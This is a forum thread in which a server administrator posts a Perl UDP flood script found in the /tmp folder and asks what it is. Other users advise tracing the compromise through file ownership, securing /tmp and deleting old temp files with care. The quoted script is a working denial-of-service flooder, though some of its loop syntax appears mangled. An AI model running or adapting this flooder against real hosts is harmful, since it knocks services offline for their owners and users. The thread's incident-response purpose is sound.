Script in tmp made by Hacker

[jeroman8]

I had a script made by a hacking team called UMHCreW in my TMP folder.
Anyone know what it is ?

Is it ok to remove/delete ALL files in the tmp folder or will this
screw something up ?
I have old files and a lot of folders and crazy files in there.

Here's the script...


#!/usr/bin/perl
#####################################################
# Simple but agressive udp flood.
#
# gr33ts: Amaz1ng^ RUBIN1,Caffeine,cyberboki, etc.
#
# lemurian from UMHCreW @ eu.undernet.org #deadworld
######################################################

use Socket;

[email protected];

if ($ARGC !=3) {
printf "UMHCreW 2004\n";
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "Simpe but Agressive udp flood - [email protected]\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (; {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (; {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

 

[chirpy]

Well, that's just the symptoms of a problem. What are is the ownership of that file? If it's nobody:nobody, then you have a vulnerable PHP script on your server and you need to track it down and either fix or remove it. If it's owned by a user, you can then suspend their account while you investigate further. You should also make sure that the script is not actually running on your server (i.e. look for it having open ports) and then definitely move it somewhere safe. Simply deleting it first before investigating further is not necessarily the best thing to do. Moving it, or tar'ing it up and preserving the ownership should be first.

 

[GOT]

Good advice for sure chirpy.

Also make sure that you secure your /tmp directory (/scripts/securetmp is the easiest method.)

 

[jeroman8]

yes it's nobody that owns the file

How can I track which php script does this ?
Just some basic stuff so I can go from there would be nice

 

[GOT]

Short of running php as suexec you'll really not be able to track it down, save for seaching every php file and even that may not turn it up.

You cannot prevent php from writing to the /tmp directory, so what you need to do is make it so that people cannot execute programs from there. Remove access to compilers. Security for your server needs to be taken very seriously (not saying that you are not) and you should either spend some time reading up on how to secure your linux server, or contract it to one of the several reputable server admins hanging around.

 

[jeroman8]

Thank you!

Is it ok to delete all old tmp files ?
They are just there right, leftovers...

 

[GOT]

Yes, it is generally safe to delete them. In some cases if you are running Fantastico, it might cause a decoder error.

 

[chirpy]

Make sure that you don't delete the mysql lock file.